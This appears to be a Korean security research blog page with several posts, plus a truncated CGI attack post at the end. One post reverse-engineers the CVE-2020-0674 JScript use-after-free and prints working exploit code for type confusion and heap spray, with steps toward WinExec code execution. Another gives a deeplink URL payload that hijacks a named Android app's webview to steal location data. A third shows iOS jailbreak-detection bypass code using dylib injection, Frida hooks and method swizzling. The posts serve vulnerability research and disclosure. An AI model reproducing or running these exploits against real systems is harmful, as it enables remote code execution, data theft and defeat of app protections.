+ 시작합니다
+ +
+
+
+
+
+ 
+
+
+
+
+
+ taejin@stealien.com
+
+ Stealien
+
+
+
+
+
+ 
+ Gogil
+ 2020년 1월 14일, Microsoft Windows 7 운영체제의 지원이 중단되었다. 지원 중단된 운영체제를 사용할 경우, 보안 업데이트가 중단되어 악성 프로그램에 감염될 확률이 높다. 본 게시글은 공격자 관점에서 원격 코드 실행 취약점을 구현한다. 취약점을 구현하는 과정에서 요구되는 기술을 소개하고 보안 업데이트의 경각심을 높인다.
+ +Windows 7 운영체제는 Internet Explorer(IE) 웹브라우저가 기본 탑재되어 있다. Windows 보안 패치를 적용하지 않을 경우, IE의 보안 패치가 적용되지 않는다. 최신 패치가 적용되지 않은 소프트웨어는 N-Day 취약점에 노출되므로 IE는 공격 대상으로 적합하다. Windows 7 지원이 중단된 다음달, 2월 11일 패치가 배포된 CVE-2020-0674 취약점은 scripting engine에서 발생하는 memory corruption 취약점으로, wild에서 watering hole 공격에 사용되었다. 본 취약점이 발생하는 JScript는 IE8 버전 이하에서 동작하지만, IE9 이상 버전에서 문서 호환성 모드를 이용하면 호출 가능하다. 본 취약점에 대해 online에 공개된 내용이 적어, 공격자는 보안 업데이트의 패치 내역을 조사하여 취약점 발생 지점을 파악하고 exploit을 구현해야 한다.
+ +취약점 발생 지점을 파악하기 위해 scripting engine이 구현되어 있는 jscript.dll 모듈의 보안 업데이트 적용 전/후를 비교한다. 보안 업데이트 파일은 소프트웨어 제조사인 Microsoft 홈페이지에서 배포한다. 보안 업데이트 파일의 확장자는 msu이고, 파일 형식은 cab 압축 파일 형태이다. Expand 도구를 이용하여 압축 해제 및 파일 추출이 가능하다.
+ +Diaphora, BinDiff 등의 diffing 도구를 IDA 디스어셈블러와 연동하여 사용한다. 패치 전 jscript.dll 5.8.9600.19597 버전과 패치 후 jscript.dll 5.8.9600.19626 버전을 비교한다.
+ + |
+
|---|
| 그림 1. Diaphora의 비교 결과 | +
Parser::Parse, CScriptRuntime::EnsureGcAlloc, ScrFncObj::PerformCall, CSession::GetVarStack 함수 등이 추가되었다.
+ +변경된 코드 중 Garbage Collector(GC)와 관련된 코드에 주목한다. 패치 이후 ScrFncObj::Call 함수가 간소화되고 기존 ScrFncObj::Call 함수의 코드가 새로운 이름의 ScrFncObj::PerformCall 함수에 구현되었다. 패치 이전 ScrFncObj::Call 함수의 코드가 ScrFncObj::PerformCall 함수로 이동된 부분을 제외하면, 추가된 코드는 ScavVarList::Init 함수 호출이다.
+ + |
+
|---|
| 그림 2. 패치 이전의 ScrFncObj::Call 함수 | +
 |
+
|---|
| 그림 3. 패치 이후의 ScrFncObj::PerformCall 함수 | +
ScrFncObj 클래스는 Script Function Object의 약자로 추정된다. ScrFncObj::Call 함수는 사용자 정의 함수 등의 스크립트가 call(호출)될 때 실행되는 함수다. 패치 이후 VAR::SetHeapJsObj 함수와 CScriptRuntime::Init 함수 사이에 ScavVarList 클래스를 사용하는 코드가 추가되었다. VarStack::ContainsVarList 함수는 session의 스택과 VarList를 인자로 받으며, session의 스택이 VarList를 포함하고 있는지 확인한다. VarList는 ScrFncObj::Call가 call하는 함수의 매개변수다. 추가된 코드를 해석하면, 매개변수가 현재 session의 스택에 포함되어 있지 않은 경우 ScavVarList::Init 함수를 호출한다. ScavVarList::Init는 IScavengerBase::LinkToGc 함수를 호출하여 VarList를 GC에 연결시킨다.
+ + |
+
|---|
| 그림 4. ScavVarList::Init 함수 | +
JScript는 Number, String, Object 등의 객체를 Variant 구조로 구현한다. Variant는 32비트 환경에서 0x10 크기이다. 오프셋 0의 2바이트는 객체의 종류, 오프셋 8의 4바이트는 데이터 포인터를 저장한다. 메모리 관리의 효율성을 위해 100개의 Variant 저장이 가능한 GcBlock을 사용한다. GcBlock은 double linked list 형태다. 첫 4바이트는 이전 블록을 가리키는 포인터, 다음 4바이트는 다음 블록을 가리키는 포인터, 이후 Variant 100개 저장이 가능한 구조다. 32비트 환경에서 4+4+16*100의 0x648 크기를 가진다.
+ +Garbage Collector는 표시하고 쓸기(Mark and Sweep) 알고리즘으로 동작한다. Mark(표시) 과정은 GcBlock을 순회하며 GcAlloc::SetMark 함수에서 수행한다. Variant 객체 종류를 나타내는 첫 2바이트에 0x800을 OR 연산하여 12번째 비트에 mark한다.
+ + |
+
|---|
| 그림 5. GcAlloc::SetMark 함수 | +
다음으로 scavenge 과정을 수행한다. Scavenge 과정은 GcContext::ScavengeVar 함수에서 사용중인 Variant의 mark를 지운다. 0xF7FF를 AND 연산하여 12번째 비트를 0으로 설정한다.
+ + |
+
|---|
| 그림 6. GcContext::ScavengeVar 함수 | +
Sweep(쓸기) 과정은 GcAlloc::ReclaimGarbage 함수에서 mark를 확인한 후 여전히 mark된 Variant에 대해 VAR::Clear 함수를 호출한다. VAR::Clear 함수는 객체 종류를 0으로 설정한다.
+ + |
+
|---|
| 그림 7. GcAlloc::ReclaimGarbage 함수 | +
 |
+
|---|
| 그림 8. VAR::Clear 함수 | +
GcBlock 내의 모든 Variant가 clear 상태일 때 GcBlockFactory::FreeBlk가 호출되며, GcBlockFactory::FreeBlk가 50번 호출될 때 메모리 free가 이루어진다.
+ + |
+
|---|
| 그림 9. GcBlockFactory::FreeBlk 함수 | +
패치 내역 조사 결과로 미루어 보아 본 취약점은 함수 매개변수가 GC에 연결되지 않아 발생한다. 매개변수를 포인터로 사용하면 함수 실행중 매개변수가 Variant를 가리키게 설정 가능하다. 매개변수가 Variant를 가리키고 있는 상태에서 Variant를 해제하고 GC를 수행한다. 정상적인 경우, 매개변수가 가리키고 있는 Variant는 사용중이므로 scavenge에 의해 mark가 제거되어야 한다. 매개변수가 GC에 연결되어 있지 않은 경우, scavenge 과정에서 생략된다. Scavenge 과정에서 생략되어 mark가 제거되지 않으면, sweep 과정에서 mark된 Variant가 clear 된다. 이후 매개변수에서 Variant를 참조하면 매개변수는 Variant를 가리키고 있지만 해당 Variant는 clear된 상태이므로 Use After Free 취약점이 발생한다. JsArrayFunctionHeapSort, JsJSONStringify 등의 콜백함수에서 생성되어 전달되는 매개변수는 스택에 포함되어 있지 않다. 콜백함수에서 매개변수에 Variant를 저장하고, Variant를 해제한 후 GC를 수행하여 취약점 트리거가 가능하다.
+ +개념 증명 코드는 다음과 같다.
+ +<script language="Jscript.Encode">
+ var arr = new Array(1, 2);
+ arr.sort(fncCompare);
+
+ function fncCompare(arg1, arg2) {
+ var variant = new Object();
+ arg1 = variant;
+
+ variant = null;
+ CollectGarbage();
+
+ alert( typeof arg1 );
+ }
+</script>
+Typeof 명령어를 사용하면 CScriptRuntime::TypeOf 함수에서 Variant 객체 종류를 식별한다. 개념 증명 코드에서 typeof하는 Variant는 clear 상태이다. Clear 상태인 Variant는 객체 종류가 0이므로 typeof 결과가 undefined으로 출력된다.
+ + |
+
|---|
| 그림 10. TypeOf 함수에서 식별하는 Variant 메모리 덤프 | +
GcBlock이 해제된 후, 같은 크기의 메모리를 할당하면 LFH(Low Fragmentation Heap)에 의해 같은 주소에 메모리가 할당되어 Type Confusion을 발생시킬 수 있다. GcBlock은 GcBlockFactory::FreeBlk가 50번 호출되어야 메모리 해제를 수행한다. 임의의 Varaint를 50100개 해제한 후 GC를 호출하면 GcBlock 50개가 해제되므로 메모리 해제가 수행된다. JScript를 이용하는 공격자들은 원하는 크기의 메모리를 할당하기 위해 NamedList를 사용한다. 32비트 시스템에서 NamedList의 메모리는 ((2이름길이+0x32)*2+4) 크기로 할당된다. GcBlock의 크기는 0x648 이므로, 0x178 길이의 이름을 사용할 경우 0x648 크기의 메모리가 할당된다.
+ + |
+
|---|
| 그림 11. NameList::FCreateVval 함수에서 메모리 할당 | +
매개변수가 가리키고 있는 해제된 Variant 위치에 새로 할당한 NamedList가 위치해야한다. 한 번의 Use After Free로는 가능성이 낮다. Exploit의 신뢰성을 높이기 위해 재귀함수를 이용하여 JsArrayFunctionHeapSort 함수를 1000번 호출한다. 콜백함수가 1000번 호출되면, 매개변수를 1000번 사용할 수 있다. Variant를 1000개 생성한 후, 재귀함수에서 각 매개변수에 대입한다. 각 매개변수는 전역변수에 저장해두고, 마지막 재귀함수에서 Variant를 해제하고 GC를 호출하여 취약점을 발생시킨다. 해제된 Variant 위치에 공격자가 컨트롤한 데이터를 위치시키기 위해 NamedList를 다수 생성한다.
+ +Number Variant의 종류는 0x0003 이다. NamedList를 이용하여 가짜 Number Variant를 만든다. NamedList에서 생성하는 가짜 Variant는 해제되기 전 GcBlock에 위치한 Variant와 동일한 위치에 적재되어야 한다. NamedList는 GcBlock과 구조가 다르므로 패딩을 주어 위치를 맞춘다.
+ +Type Confusion을 이용하여 가짜 Number를 구현한 코드는 다음과 같다.
+ +<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+ var arr_spray = new Array();
+ var arr_uaf = new Array();
+ var arr_overlap = new Array();
+
+ var arr_ref = new Array();
+ var arr_sort = new Array();
+
+ var callback_idx = 0;
+ var maxnum = 1000;
+
+ var name = "\u4141\u4141"; // padding
+ while (name.length != 0x16A) {
+ name += "\u0003\u0000\u0000\u0000\u1337\u0000\u0000\u0000"; // 0x0003 is Number
+ }
+ while (name.length != 0x178) {
+ name += "\u4141";
+ }
+
+ function fncCompare(arg1, arg2) {
+ if (callback_idx < (maxnum-1)) {
+ arg1 = arr_uaf[callback_idx];
+ callback_idx = callback_idx + 1;
+ arr_sort[callback_idx].sort(fncCompare);
+ arr_ref.push(arg1);
+
+ } else {
+
+ // for GcBlockFactory::FreeBlk
+ for (var i = 0; i < 50 * 100; i++) {
+ arr_spray[i] = new Object();
+ }
+ for (var i = 0; i < 50 * 100; i++) {
+ arr_spray[i] = null;
+ }
+ CollectGarbage();
+
+ // free
+ for (var i = 0; i < maxnum; i++) {
+ arr_uaf[i] = null;
+ }
+ CollectGarbage();
+
+ // overlap
+ for (var i = 0; i < 0x1000; i++) {
+ arr_overlap[i][name] = 1;
+ }
+ }
+
+ return 1;
+ }
+
+ for (var i = 0; i < 0x1000; i++) {
+ arr_overlap[i] = new Array();
+ }
+
+ for (var i = 0; i < maxnum; i++) {
+ arr_sort[i] = new Array(1, 2);
+ }
+
+ for (var i = 0; i < maxnum; i++) {
+ arr_uaf[i] = new Object();
+ }
+
+ arr_sort[0].sort(fncCompare);
+
+ for (var i = 0; i < maxnum; i++) {
+ if ((typeof arr_ref[i]) === "number") {
+ if (arr_ref[i] === 0x1337) {
+ alert( i + " / " + typeof arr_ref[i] + " / " + arr_ref[i].toString(16) );
+ break;
+ }
+ }
+ }
+</script>
+실행 결과는 다음과 같다.
+ + |
+
|---|
| 그림 12. 사용 중인 Object Variant | +
 |
+
|---|
| 그림 13. Clear 및 free된 Variant | +
 |
+
|---|
| 그림 14. NamedList에 의해 overlap되어 생성된 가짜 Number Variant | +
 |
+
|---|
| 그림 15. Type Confusion된 가짜 Number를 출력한 결과 | +
JScript는 문자열을 BSTR 형식으로 저장한다. 문자열을 나타내는 String Variant의 종류는 0x82 이고, 데이터는 BSTR의 Data String 포인터를 가리킨다. Type Confusion을 통해 가짜 String Variant를 생성할 때, BSTR의 포인터 대신 읽고자 하는 메모리 주소를 삽입한 후 문자열을 읽으면 임의 메모리 읽기가 가능하다. + JScript의 Image Base 주소를 얻기 위해 Object 객체의 메모리를 읽어야 한다. Object 객체는 종류 0x81인 Object Variant가 가리킨다. Use After Free 취약점에 사용되는 Object Variant에 RegExp 객체를 사용할 경우, Object Variant의 데이터는 RegExp 포인터가 저장된다. GcBlock을 해제하면 VAR::Clear가 Object Variant의 종류를 0으로 설정하지만, 데이터는 지우지 않는다. 이후 해제된 GcBlock을 재사용할 때, GcBlock은 해제되기 전 Object Variant의 데이터에 존재하는 RegExp 객체 포인터를 가지고 있다. 가짜 Number Variant의 데이터로 입력한 \u1337을 입력하지 않으면, 기존에 존재하는 RegExp 객체 포인터를 읽는다. RegExp 객체를 생성할 때, 패턴을 지정하면 RegExp 객체와 컴파일된 패턴 문자열이 차례로 GcBlock에 생성된다. 패턴 문자열은 문자열이 필요한 경우 사용이 가능하다.
+ + |
+
|---|
| 그림 16. NamedList에 의해 생성된 가짜 Number Variant와 객체 포인터 | +
객체 메모리를 읽기 위해 가짜 String Variant를 생성하고 객체 포인터를 String Variant의 데이터로 삽입한다. 객체의 첫 4바이트는 JScript 모듈에 위치하는 객체 함수 주소 테이블이고, 오프셋 0x40 바이트 위치에 컴파일된 패턴 Variant의 주소가 있다. 객체 함수 주소 테이블에 0xFFFF0000을 AND 연산하여 JScript의 Image Base를 얻는다. 컴파일된 패턴 Variant 주소는 GcBlock에 존재하므로 RegExp 객체의 오프셋 0x40 바이트의 4바이트를 읽으면 NamedList Overlap을 수행하는 GcBlock의 주소를 알 수 있다.
+ + |
+
|---|
| 그림 17. RegExp 객체 메모리 | +
JScript 모듈 주소를 기반으로 Kernel32 모듈의 WinExec 함수 주소를 구한다.
+ +Object Variant를 이용하여 코드 실행이 가능하다. Typeof 메소드를 처리하는 CScriptRuntime::TypeOf에서 Variant의 데이터가 가리키는 값에 0x9C를 더한 주소가 가리키는 값으로 EIP가 변경된다.
+ + |
+
|---|
| 그림 18. CScriptRuntime::TypeOf 함수에서 가상 함수 호출 | +
가짜 Object Variant를 생성하고 데이터 포인터로 현재 GcBlock의 조작 가능한 주소를 삽입한다. NamedList를 이용하여 데이터를 알맞게 조립하면 EIP 변경이 가능하다. EIP 변경을 통해 WinExec 호출이 가능하지만 인자 전달이 안되므로 JScript 내에 위치한 ROP 가젯을 이용한다. 가상 함수를 호출하기 전, EAX 레지스터에 Object Variant 데이터 포인터가 가리키는 값이 저장된다. EAX 값을 ESP로 이동하는 가젯으로 EIP를 변경한 후, WinExec로 이동하면 스택이 GcBlock에 존재하므로 인자 조절이 가능하다. RegExp 객체의 컴파일된 패턴 문자열을 WinExec의 인자로 사용하여 공격자가 원하는 명령어 실행이 가능하다.
+ + |
+
|---|
| 그림 19. WinExec 호출하여 커맨드 실행 | +
+ +
+
+
+
+
+
+ 장태진(TAEJIN)
+ 안드로이드 어플리케이션 버그헌팅을 위해 사례 조사를 진행하였으며, 사례 조사를 위해 해커원을 이용했다. 해커원에서 한 해커가 Deeplink를 공격벡터로 하여 취약점을 발굴하는것을 확인하였으며, 이를 우리나라 어플리케이션에 공격을 진행해보았다. 구글 플레이 스토어에서 인기 앱 3000개를 다운받았으며, 그 중 “쇼핑몰”, “배달앱”을 집중적으로 분석한 결과, 많은 어플리케이션이 이 공격에 취약한 것으로 확인되었다. 발견한 취약점은 모두 KISA를 통해 신고를 하였으며, 대부분의 취약점이 지금은 패치되었다. 지금은 효율적인 공격을 위해 퍼저와 분석도구를 개발완료한 상태이다.
+ +이 공격방식을 이용하여 발견한 H어플리케이션의 취약점은 CVE-2019-9140 를 받았으며, KISA에서는 심각도를 “HIGH”로 설정하였다.
+ +참고: https://www.krcert.or.kr/data/secInfoView.do?bulletin_writing_sequence=35102
+ +Deeplink는 URI를 통해 어플리케이션을 작동하기위한 하나의 기능이다.
+ +일반적으로 http://www.stealien.com 등의 URL을 클릭하면 자동으로 웹 브라우저가 실행된다.
+ +운영체제는 어떻게 웹 브라우저를 실행시켜줄까? 이는 바로 웹 브라우저가 이 기능을 “명시”하였기 때문이다. 안드로이드 운영체제의 경우에는 AndroidManifest.xml에서 Browsable로 본인이 실행 되고 싶은 intent를 명시한다.
+ +안드로이드 크롬 어플리케이션 또한 http 또는 https 로 실행될 때 해당 앱의 특정 클래스를 로딩해달라는것이 명시되어있다.
+ +다른 일반적인 예시로는 동영상 플레이어가 있다. 파일어플리케이션이나 웹 브라우저에서 다운로드받은 동영상을 클릭하면 동영상 앱이 뜨는 경우가 있다. 이 또한 동영상 플레이어마다 AndroidManifest.xml에 명시된 규칙에 따라 실행되는 것이다. 안드로이드의 경우 동영상 플레이어가 여러개 설치되어있는 경우 어떤 동영상 플레이어로 실행할지 고르는 팝업이 뜨는데, 이는 해당 동영상 플레이어들의 실행 규칙에 해당하기 때문이다.
+ +http 스키마 뿐만이 아니라 다른 여러가지 스키마를 사용 할 수 있는데, m사의 경우 melonapp://을, CVE-2019-9140의 H앱은 hmapp:// 을 사용한다.
+ +Deeplink로 실행된 임의의 어플리케이션의 특정 클래스는 전달받은 URI를 파싱하고, 이 URI에 따라 작동한다. 예를 들어서 “태진 배달 어플리케이션”이 있다고 하자. 이 회사가 운영하고 있는 홈페이지에서 어플리케이션의 주문페이지를 열고 싶은 경우 “taejin://open?page=history”를 클릭하게 하여 주문 페이지를 열 수 있다.
+ +대부분의 어플리케이션은 웹뷰를 사용하는데, 이는 공지사항, 게시물 등 디자인/개발 문제로 인해 html로 보여줘야만 하는 경우에 주로 사용한다. 특히나 웹뷰를 핵심으로 사용하고 있는 웹앱과 하이브리드앱 또한 존재한다.
+ +또한 대부분의 어플리케이션은 웹뷰에서 보여주고 있는 자사의 웹페이지와 어플리케이션의 연동을 위해 Javascript Interface를 사용하며, 이를 통해 웹 페이지에서 어플리케이션을 제어 할 수 있는 함수를 실행 할 수 있다. 일반적으로 사용자 계정을 제어하거나 파일 제어, 위치 정보 호출 등을 지원한다.
+ +이러한 Javascript Interface를 공격자가 임의로 사용하기 위해서는 Webview에 공격자의 웹 사이트를 띄워야하므로, 우리는 이러한 행위를 Webview Hijacking이라고 부르기로 하였다.
+ +이는 Deeplink를 공격벡터로 하여 Webview를 장악하는 것을 뜻한다. 취약점을 파급도를 높히기 위해 클릭 한번으로 앱을 제어 할 수 있는 Deeplink를 이용한 Webview Hijacking이다.
+ +H어플리케이션은 Deeplink를 통해 Webview Hijacking을 할 수 있으며, 이 어플리케이션은 Javascript Interface에서 GPS정보를 제공해주는 함수를 구현하였기 때문에 위치정보를 탈취 할 수 있었다.
+ +우선 AndroidManifest.xml을 분석한 결과 다음과 같은 deeplink를 통해 어플리케이션을 실행 할 수 있는 것을 확인하였다.
+ +
위 네가지 경우에 com.hpapp.IntroActivity가 호출되므로 이 class를 우선적으로 분석한다.
이 코드는 IntroActivity의 일부로, nextActivity이다. 이 메소드를 확인해보면 hpeventurl= 이라는 값이 전달받은 uri에 존재한다면str2를 hpeventurl= 이후의 값으로 만든다. 예를 들어 happypointcard://deeplink?hpeventurl=https://www.bughunting.net/이라는 값이 전달받은 uri인 경우 str2의 값은 https://www.bughunting.net/이 되는 것이다. 이 값은 공격자가 임의로 수정 할 수 있는 것이기 때문에 SecondIntroActivity.class로 이동 할 때 CommonDefine.INTENT_DATA_SHOW_HAPPY_MARKET 를 키로 하여 값으로 전달된다.
전달받은 CommonDefine.INTENT_DATA_SHOW_HAPPY_MARKET 은 SecondIntroActivity의 goMainActivity 메소드에서 MainActivity.class에 전달된다.
MainActivity의 onCreate함수에서는 checkEvent 메소드를 실행한다.
checkEvent메소드에서는 단순히 스키마를 체크하는 것이 아니라, intent를 와 this를 전달하여 체크한 스키마가 happypoint인 경우 MainActivity를 다시 실행하고, 로직에 따라 다시 웹뷰가 실행된다.
지금은 아래와 같이 패치되었으나, 원래는 해당 부분에서 호스트네임을 검사하지 않았다. 만약 제대로 되어있다면 moveHappyMarket이 호출된다.
+ +
)
호출된 아래 함수에서는 str이 공백이 아닌경우 INTENT_DATA_REDIRECT_URI의 value로 들어가는 것을 확인 할 수 있다. 이는 MainActivity를 다시 실행한다.
+ +(아래 사진에 나와있는 코드는 해피포인트 6.4.3의 코드로, 취약점 분석을 진행한 해피포인트 앱의 버전과 다를 수 있다)
+ +
MainActivity에서는 initRequestService 함수를 실행하며, 이 이후부터는 initWebview함수를 이용하여 Webview를 초기화하고 url을 전달받은 인자값으로 바꾼다.
+ +
Webview를 통해 앱 내에서 임의의 페이지를 열 수 있으므로 원하는 Javascript를 실행 할 수 있게 되었다. 이제 제어가 가능한 Webview에서 사용가능한 Javascript Interface를 찾아보아야한다. 분석 결과, 다음과 같은 함수들을 자바스크립트에서 실행 할 수 있었으며, 분석결과 현재 좌표, 동의 여부, 사용자 정보(전화번호)를 탈취 할 수 있었으며, 이외에도 앱의 일부 기능을 수행 할 수 있었다.
URL에 대해 별다른 검증을 하지 않으므로, 다음과 같이 공격하였다.
+ +happypointcard://deeplink?hpeventurl=javascript:window.App={recvLocation:function(a,b){alert(a+","+b)}};android.myLocationGPS()
이 URL을 /를 통해 일반 링크처럼 표시하였으며, 클릭시 다음과 같은 alert가 뜨는 것을 확인 할 수 있다. 또한 여건에 따라 출력된 데이터들을 Ajax를 통해 공격자의 서버에 저장 할 수 있다.
+ +
이 취약점을 포함하여 많은 어플리케이션을 제보하였고, KISA 연구원님들과 함께 보안 조치 매뉴얼을 제작할 수 있는 기회가 생겨 도움을 드렸다.
+ +https://www.krcert.or.kr/data/guideView.do?bulletin_writing_sequence=35434
+ +현재 KISA에서는 Deeplink 관련 취약점에 대해 포상을 진행하지 않는다.
+참고 자료 없이 혼자서 연구한 부분이기 때문에 오류가 있을 수 있습니다. 오류를 찾으셨다면 taejin@stealien.com 으로 메일 부탁드립니다.
+
+
+
+
+
+ 
+ 함세련, 고기완
+ 피싱 앱을 통한 신종 보이스 피싱 등 모바일 앱을 대상으로 하는 공격이 있다. 앱 개발사는 공격자로부터의 해킹을 예방하기 위해 앱 배포 전 백신, 플랫폼 해킹 탐지, 역공학 방지, 앱 위변조 여부를 확인한다. 이러한 대처에도 불구하고 블랙 해커들로 인해 동일한 사고가 발생하고 있다. 현존하는 iOS 보안 기술 동향들을 연구 및 기술하고 보안 솔루션에 우회 기술을 적용해보아 앞으로의 보안 기술 발전에 조금이나마 도움이 되고자 한다.
+ +공격자들이 피해자들에게 위변조된 앱을 배포하기 위해서, OS 위변조 탐지(=플랫폼 해킹 탐지)와 앱 위변조 탐지 우회가 필수적이다. third-party APP 설치를 위해서는, 순정단말이 아닌 OS가 변조된 jailbreak device이어야만 한다. 주요 로직(ex. ID, PWD 전송, 계좌 송금 등) 변조를 위해서는 앱을 위변조하여 실행해야 한다. 그러나 개요에서 설명하였듯이, 보안 모듈로 인해 jailbreak device, 앱 위변조는 탐지되므로 앱 이용이 불가하다. 배포되어 악의적인 수행을 하는 APP들은 현존하는 OS 위변조 탐지, 앱 위변조 탐지 기술들을 우회하도록 위변조됐다. 그렇기에 이 두 가지 보안 기술을 중점으로 살펴봤다.
+ +- File/Directory 존재 여부 확인
+iOS는 앱을 통한 시스템 변조 가능성을 배제하기 위해, 각 앱마다 sandbox라는 앱 접근 가능 영역이 존재한다. 하지만 시스템 앱은 system partition에 설치되며 sandbox 제한이 없다. 그러므로 공격자들은 공격 도구, Cydia와 같은 Tweak관련 파일들을 root partition(=system partition) 하위 경로에 저장한다. system partition 검사를 통해 탈옥 관련 파일 리스트를 추출한 후 경로 검사를 통해 jailbreak 탐지가 가능하다.
- File/Directory 접근 권한 확인/변조
+jailbreak 도구 실행 시, 접근 권한이 변경되는 file/directory가 존재한다. 단말기에서 각 앱들의 sandbox 영역 외 File/Directory 권한 확인 가능, 파일 권한값 획득 여부 검사를 통해서 탈옥을 검증한다.
- File 작성, 수정 및 제거 시도
+jailbreak 툴들은 설치한 thirdparty-app의 sandbox를 무력화시키기도 한다. 그러므로 탈옥단말기에서는 sandbox 외 시스템 File, directory 접근 가능하다. 각 앱들의 sandbox 영역 외 File/Directory 경로 접근 및 읽기, 쓰기, 제거, 작업 디렉터리 경로 변경 등을 시도하여 탈옥 탐지가 가능하다. 주로 /tmp 하위 폴더 내 작업 시도한다.
- 동적 라이브러리 확인
+프로세스에 로딩된 라이브러리 중 탈옥환경에서 실행 가능한 후킹 도구, tweak 관련 모듈명(ex, Substrate, TweakInject, cycript, SBInject, pspawn, rocketbootstrap, colorpicker, CS, bfdecrypt 등) 검사를 통해 jailbreak을 탐지한다.
- fork 시도
+sandbox로 인해 순정 단말기 내 앱 프로세스는 fork() 이용이 불가하나, sandbox 제한 없는 탈옥단말기에서는 가능하다. jailbreak 단말기에서 fork() 실행 후, 결과 값 확인을 통한 정상 실행 여부 검사한다.
- Schema 확인
+Android와 마찬가지로 iOS도 custom URL을 지원한다. 탈옥 관련 앱들(Cydia, Sileo, zbra, undecimus, iFile 등) 존재 여부 파악을 위해, URL Schema를 이용하여 앱 실행 여부를 확인한다.
- Shell 실행
+system()은 SHELL_PATH로 /bin/sh를 이용하나, 순정디바이스에서는 /bin/sh 접근이 불가하다. system()는 쉘 이용 불가 시, 0을 반환한다. 탈옥단말기에서는 /bin/sh에 접근이 가능하므로, system() 정상 실행이 가능하다.
- Binding Port 확인
+탈옥환경에서 hooking 도구인 Frida를 이용하여 실행 파일 분석이 가능하다. Frida는 27042 port를 default로 이용한다. socket 생성 후, connect()를 이용하여 frida default port open 여부를 확인한다.
- symbolic link 확인
+iOS에는 크게 2개의 영역이 존재한다. 하나는 용량이 적은 read-only system 영역이고, 다른 하나는 data 영역이다. jailbreak 툴들은 공간이 작은 system 영역 대신 data 영역에 thirdparty software를 저장하고, symbolic link를 통해 연결해놓는다. 파일, 폴더의 symbolic link를 확인한다.
- Binary File 기반 hash 검증
+Mac에서 제공하는 API를 이용하여 앱 실행 파일 경로 획득, 파일 접근이 가능하다. 이후 파일 해쉬 생성을 통해 위변조 검증이 가능하다.
- Memory 기반 hash 검증
+메모리상에서 실행 모듈 base 주소 획득 후 접근하여 data(실행 파일 전체, Code section, File signature 등) Hash, 암호화를 통해 검증할 수 있다. 주로 코드 섹션 __TEXT 세그먼트의 __text 섹션의 해시를 검증한다.
iOS 애플리케이션의 바이너리는 Mach-O구조로 이루어진다. Mach-O는Header, Load Commands, Data로 이루어져 있다. Load Commands는 다수의 Command를 포함하며 동적 라이브러리는 Command영역에 정의한다. 동적 라이브러리는 iOS운영체제에 존재하는 기본 라이브러리와 애플리케이션 개발자가 삽입한 동적 라이브러리가 포함된다. 다수의 동적 라이브러리가 정의된 경우 Command 순서대로 라이브러리가 로드된다.
+ +
공격자는 애플리케이션 바이너리의 Load Commands를 조작하여 악의적인 동적 라이브러리 삽입이 가능하다. 공격자의 동적 라이브러리가 첫 번째로 정의된 경우, 애플리케이션의 바이너리 코드와 기타 보안 모듈의 동적 라이브러리보다 먼저 호출된다. 보안 모듈보다 먼저 호출된 동적 라이브러리는 메모리 조작을 통해 보안 모듈을 손쉽게 무력화한다.
+ +순정단말기에서는 앱을 리패키징하여 메모리 접근할 수 있으나, 최고(root) 권한 이용 가능한 device에서는 시스템 환경변수를 통한 라이브러리 삽입이 가능하다. 그러므로 탈옥환경에서는 앱 위변조 우회하지 않은 상태에서 로직 변조가 가능하다.
+ +공격자의 동적 라이브러리는 애플리케이션의 메모리에 자유롭게 접근한다. 보안 모듈의 디버깅 방지 기능은 타 프로세스에서의 접근을 방지하므로 동적 라이브러리 삽입을 통한 메모리 접근은 디버깅 방지 기능에 영향을 받지 않는다. 함수 후킹을 위해서 함수 시작 부분의 명령어나 주소 테이블 내 주소를 변조할 수있다. Frida를 이용하여 API 인라인 후킹을 구현한 코드는 다음과 같다.
+#대상 프로세스 attach |
Objective-C는 클래스의 메소드를 호출할 때, 함수 주소에 의한 호출이 아닌 객체에 메시지를 전송하여 메소드를 호출한다. 메시지를 받은 객체는 dispatch table에서 각 메시지에 해당하는 메소드를 호출한다. Objective-C의 메소드 호출 방식으로 인해 메소드 교체가 가능하다. iOS는 특정 메소드의 구현을 변경하는API를 제공한다.
+ +공격자의 동적 라이브러리는 애플리케이션의 클래스와 메소드에 자유롭게 접근 가능하다.
+ +method_exchangeImplementations API를 이용하여 메소드 스위즐링을 구현한 코드는 다음과 같다.
+ +#include <objc/runtime.h> #include <objc/message.h> … // 스위즐링 대상 클래스와 메소드를 가져온다 Class clsTarget = objc_getClass(“TARGET_CLASS_NAME”); Method methodOrg = class_getInstanceMethod(clsTarget, @selector(TARGET_SELECTOR));
// 스위즐링 대상 클래스에 공격자의 메소드를 삽입한다 class_addMethod(clsTarget, @selector(MY_SELECTOR));
// 스위즐링 대상 클래스에 존재하는 메소드와 삽입한 메소드를 교체(스위즐링)한다 Method methodNew = class_getInstanceMethod(clsTarget, @selector(MY_SELECTOR)); method_exchangeImplementations(methodOrg, methodNew); |
본 게시글에서 앱 보안 기술과 더불어 우회 기법을 소개하였다. 공격자로부터 앱을 보호하기 위해 다양한 보안 기술을 탑재한 보안 솔루션들이 존재한다. 국내 iOS 앱 보안 솔루션 총 5개에 본 게시글에서 소개하는 우회 기법을 적용한 결과, AppSuit를 제외한 타 솔루션들의 탈옥 탐지와 위변조 탐지 로직 무력화가 가능하였다. 소개한 기법을 이용하여 보안 솔루션들이 무력화되므로 안전한 iOS 앱 보안을 위해 전문적인 보안 솔루션 적용을 권고한다.
+ +
+
+
+
+
+
+ 김도현
+ 다양한 임베디드 서비스 및 IoT에서 사용되는 CGI 프로그램을 공격하는 일반적인 방법에 대해 알아 보겠습니다.
+ +CGI는 웹 서버상에서 사용자 프로그램을 동작시키기 위한 조합입니다. 존재하는 많은 웹 서버 프로그램은 CGI의 기능을 이용할 수 있습니다. CGI는 환경변수나 표준입출력을 다룰 수 있는 프로그램 언어에서라면 언어의 구별을 묻지 않고 확장하여 이용하는 것이 가능하나, 실행속도나 텍스트 처리의 용이함 등의 균형에 의해 펄이 사용되는 경우가 많았습니다.[^1]
+ +CGI는 주로 Router, NAS와 같은 다양한 Embedded device, IoT Service를 위해 사용됩니다.
+ + | Server
+ |
++--------+ | +-------------+ +-------------+
+| Client |<=---HTTP---=>| HTTP Server |<=---=>| CGI Program |
++--------+ | +-------------+ +-------------+
+ |
+ |
